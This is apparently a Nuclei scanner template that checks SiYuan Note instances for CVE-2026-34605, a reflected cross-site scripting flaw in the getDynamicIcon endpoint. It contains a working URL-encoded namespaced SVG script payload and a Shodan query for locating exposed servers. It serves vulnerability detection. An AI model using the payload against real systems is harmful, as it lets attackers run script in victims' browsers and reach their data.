id: CVE-2026-34605

info:
  name: SiYuan Note - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.
  remediation: |
    Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.
  impact: |
    Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34605
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-34605
    epss-score: 0.00139
    epss-percentile: 0.33729
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,xss,svg

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</text><x:script xmlns:x="http://www.w3.org/2000/svg">alert(document.domain)</x:script><text>'
          - 'id="dynamic_icon_type8'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f4c14803a54a7feddf46b5ecca9a1167ab5be03640795216ec237caee357b75c022036c98991e7674a907212891c65096b57c5037ed498f069f27d6ce2549de0e6d4:922c64590222798bb761d5b6d8e72950